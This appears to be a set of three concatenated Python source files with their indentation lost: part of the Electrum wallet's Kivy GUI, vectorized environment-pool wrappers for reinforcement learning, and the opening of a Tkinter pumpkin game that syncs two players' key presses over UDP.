from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
else:
def launch_wizard():
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_open_wallet(self, pw, storage):
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
try:
storage.decrypt(pw)
except StorageReadWriteError:
app.show_error(_("R/W error accessing path"))
return
self.password = pw
self._on_decrypted_storage(storage)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels:
warning1 = _("Lightning support in Electrum is experimental. "
"Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable "
"from your seed. You must backup your wallet file everytime "
"you create a new channel.")
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning1 + '\n\n' + warning2, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name)
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
env_pool.py
|
"""
Vectorized environment wrappers.
"""
import numpy as np
import multiprocessing as mp
import ctypes
from baselines.common.vec_env import VecEnv
def env_worker(env_maker, conn, n_envs):
envs = [env_maker() for _ in range(n_envs)]
try:
while True:
command, data = conn.recv()
if command == "reset":
conn.send([env.reset() for env in envs])
elif command == "seed":
for env, seed in zip(envs, data):
env.seed(int(seed))
elif command == "step":
results = []
for env, action in zip(envs, data):
next_ob, rew, done, info = env.step(action)
if done:
next_ob = env.reset()
results.append((next_ob, rew, done, info))
conn.send(results)
elif command == "get_spaces":
conn.send((envs[0].observation_space, envs[0].action_space))
elif command == "render":
conn.send([env.render(mode="rgb_array") for env in envs])
elif command == "close":
break
else:
raise ValueError("Unrecognized command: {}".format(command))
except KeyboardInterrupt:
print("EnvPool worker: got KeyboardInterrupt")
finally:
conn.close()
for env in envs:
env.close()
class EnvPool(VecEnv):
"""
Uses a pool of workers to run multiple environments in parallel using
mp.Pipe (pickles data). This implementation supports multiple environments
per worker to be as flexible as possible.
"""
def __init__(self, env_maker, n_envs=None, n_parallel=None):
n_envs = n_envs or mp.cpu_count()
n_parallel = n_parallel or mp.cpu_count() / 2
# No point in having more parallel workers than environments
self.n_parallel = n_envs if n_parallel > n_envs else n_parallel
# try to split evenly, but this isn't always possible
num_worker_envs = [
len(d) for d in np.array_split(np.arange(n_envs), self.n_parallel)
]
self.worker_env_seps = np.concatenate([[0], np.cumsum(num_worker_envs)])
self.workers, self.conns = [], []
for num_envs in self.worker_env_seps[1:] - self.worker_env_seps[:-1]:
worker_conn, master_conn = mp.Pipe()
worker = mp.Process(
target=env_worker, args=(env_maker, worker_conn, num_envs)
)
worker.daemon = True
worker.start()
self.workers.append(worker)
self.conns.append(master_conn)
self.conns[0].send(("get_spaces", None))
ob_space, ac_space = self.conns[0].recv()
super().__init__(n_envs, ob_space, ac_space)
self.waiting = False
self.closed = False
# set initial seeds
seeds = np.random.randint(low=0, high=np.iinfo(np.int32).max, size=n_envs)
self.seed(seeds)
def reset(self):
assert not self.closed
if self.waiting:
self.step_wait()
for conn in self.conns:
conn.send(("reset", None))
obs = []
for conn in self.conns:
obs.extend(conn.recv())
return np.stack(obs)
def step_async(self, actions):
assert not self.waiting and not self.closed
for conn, acts in zip(
self.conns, np.split(actions, self.worker_env_seps[1:-1])
):
conn.send(("step", acts))
self.waiting = True
def step_wait(self):
assert self.waiting and not self.closed
results = []
for conn in self.conns:
results.extend(conn.recv())
next_obs, rews, dones, infos = zip(*results)
self.waiting = False
return np.stack(next_obs), np.stack(rews), np.stack(dones), infos
def seed(self, seeds):
assert not self.waiting and not self.closed
for conn, data in zip(self.conns, np.split(seeds, self.worker_env_seps[1:-1])):
conn.send(("seed", data))
def close_extras(self):
if self.waiting:
self.step_wait()
for conn in self.conns:
conn.send(("close", None))
conn.close()
for worker in self.workers:
worker.join()
def get_images(self):
assert not self.waiting and not self.closed
for conn in self.conns:
conn.send(("render", None))
imgs = []
for conn in self.conns:
imgs.extend(conn.recv())
return imgs
_NP_TO_CT = {
np.float32: ctypes.c_float,
np.int32: ctypes.c_int32,
np.int8: ctypes.c_int8,
np.uint8: ctypes.c_char,
np.bool: ctypes.c_bool,
}
def shm_worker(env_maker, conn, n_envs, obs_bufs, obs_shape, obs_dtype):
envs = [env_maker() for _ in range(n_envs)]
def _write_obs(obs):
for ob, obs_buf in zip(obs, obs_bufs):
dst = obs_buf.get_obj()
dst_np = np.frombuffer(dst, dtype=obs_dtype).reshape(obs_shape)
np.copyto(dst_np, ob)
try:
while True:
command, data = conn.recv()
if command == "reset":
conn.send(_write_obs([env.reset() for env in envs]))
elif command == "seed":
for env, seed in zip(envs, data):
env.seed(int(seed))
elif command == "step":
results, obs = [], []
for env, action in zip(envs, data):
ob, rew, done, info = env.step(action)
if done:
ob = env.reset()
results.append((rew, done, info))
obs.append(ob)
_write_obs(obs)
conn.send(results)
elif command == "render":
conn.send([env.render(mode="rgb_array") for env in envs])
elif command == "close":
break
else:
raise RuntimeError("Unrecognized command: {}".format(command))
except KeyboardInterrupt:
print("ShmEnvPool worker: got KeyboardInterrupt")
finally:
conn.close()
for env in envs:
env.close()
class ShmEnvPool(VecEnv):
"""
Uses a pool of workers to run multiple environments in parallel using shared
memory to pass observations. This implementation supports multiple
environments per worker to be as flexible as possible.
"""
def __init__(self, env_maker, n_envs=None, n_parallel=None):
n_envs = n_envs or mp.cpu_count()
n_parallel = n_parallel or mp.cpu_count() / 2
dummy = env_maker()
ob_space, ac_space = dummy.observation_space, dummy.action_space
del dummy
super().__init__(n_envs, ob_space, ac_space)
# No point in having more parallel workers than environments
self.n_parallel = n_envs if n_parallel > n_envs else n_parallel
# try to split evenly, but this isn't always possible
num_worker_envs = [
len(d) for d in np.array_split(np.arange(n_envs), self.n_parallel)
]
self.worker_env_seps = np.concatenate([[0], np.cumsum(num_worker_envs)])
self.obs_dtype, self.obs_shape = ob_space.dtype, ob_space.shape
self.obs_bufs = []
for _ in range(n_envs):
self.obs_bufs.append(
mp.Array(_NP_TO_CT[ob_space.dtype.type], int(np.prod(ob_space.shape)))
)
self.workers, self.conns = [], []
for beg, end in zip(self.worker_env_seps[:-1], self.worker_env_seps[1:]):
worker_conn, master_conn = mp.Pipe()
worker = mp.Process(
target=shm_worker,
args=(
env_maker,
worker_conn,
end - beg,
self.obs_bufs[beg:end],
ob_space.shape,
ob_space.dtype,
),
)
worker.daemon = True
worker.start()
self.workers.append(worker)
self.conns.append(master_conn)
self.waiting = False
self.closed = False
# set initial seeds
seeds = np.random.randint(low=0, high=np.iinfo(np.int32).max, size=n_envs)
self.seed(seeds)
def reset(self):
assert not self.closed
if self.waiting:
self.step_wait()
for conn in self.conns:
conn.send(("reset", None))
for conn in self.conns:
conn.recv()
return self._decode_obses()
def step_async(self, actions):
assert not self.waiting and not self.closed
for conn, acts in zip(
self.conns, np.split(actions, self.worker_env_seps[1:-1])
):
conn.send(("step", acts))
self.waiting = True
def step_wait(self):
assert self.waiting and not self.closed
results = []
for conn in self.conns:
results.extend(conn.recv())
rews, dones, infos = zip(*results)
self.waiting = False
return self._decode_obses(), np.stack(rews), np.stack(dones), infos
def seed(self, seeds):
assert not self.waiting and not self.closed
for conn, data in zip(self.conns, np.split(seeds, self.worker_env_seps[1:-1])):
conn.send(("seed", data))
def close_extras(self):
if self.waiting:
self.step_wait()
for conn in self.conns:
conn.send(("close", None))
conn.close()
for worker in self.workers:
worker.join()
self.obs_bufs.clear()
def get_images(self):
assert not self.waiting and not self.closed
for conn in self.conns:
conn.send(("render", None))
imgs = []
for conn in self.conns:
imgs.extend(conn.recv())
return imgs
def _decode_obses(self):
results = [
np.frombuffer(b.get_obj(), dtype=self.obs_dtype).reshape(self.obs_shape)
for b in self.obs_bufs
]
return np.stack(results)
|
doyouhaveguts.py
|
otherLevels=True
import Tkinter
from Tkinter import *
import time
import random
import socket
from threading import Thread
from PIL import ImageTk
import pygame
#If using other versions of the creator, change the names in the functions
# createWalls and createMonsters
import monster
if otherLevels:
import monstercreatorOther as monstercreator
else:
import monstercreator
if otherLevels:
import wallcreatorOther as wallcreator
else:
import wallcreator
pygame.mixer.init()
pygame.mixer.music.load("res/music.mp3")
pygame.mixer.music.play(-1)
top = Tkinter.Tk()
top.configure(background='light yellow')
####################### Network staff
m = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with open("ip.txt") as f:
opponent = f.readline().strip()
print opponent
def send(msg): # Send message to other computer
m.sendto(msg, (str(opponent), 5505))
def listen():
r = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
r.bind(("0.0.0.0", 5505))
while True:
data, addr = r.recvfrom(1024)
keypressForeign(data)
r.close
def keypressLocal(event):
send(event.keysym)
def keypressForeign(data): # Process incoming messsage
print data
global updateNextButton
global level
global goToNextLevel
global goToDead
if data == 'Up' or data == 'w':
turnUp()
stop()
if data == 'Down' or data == 's':
turnDown()
stop()
if data == 'Left' or data == 'a':
turnLeft()
stop()
if data == 'Right' or data == 'd':
turnRight()
stop()
if data == 'xDead':
global lives
lives -= 1
if lives == 0:
goToDead = True
print "Partner hit a monster", str(lives)
newloc = (1, 1)
if data == 'xOneFinished':
global otherFinished
otherFinished = True
if data == 'xAllFinished':
updateNextButton = True
if data[:8] == 'xLevelUp':
if int(data[8:]) != level:
goToNextLevel = True
print goToNextLevel, "Test1"
top.bind("<Key>", keypressLocal)
list = Thread(target=listen)
list.daemon = True
list.start()
#######################
# Initialize images
##Changed pictures 1.31 SOHVA
grass = ImageTk.PhotoImage(file="res/background.png")
foodimage = ImageTk.PhotoImage(file="res/spiderBG.png")
pumpkinImage = ImageTk.PhotoImage(file="res/pumpkin2BG.png")
happyImage = ImageTk.PhotoImage(file="res/happy_pumpkinBG.png")
scaredImage = ImageTk.PhotoImage(file="res/pumpkin_scaredBG.png")
monsterImages = [ImageTk.PhotoImage(file="res/ghostBG.png"), \
ImageTk.PhotoImage(file="res/82872-200BG.png"), \
ImageTk.PhotoImage(file="res/mouseBG.png")]
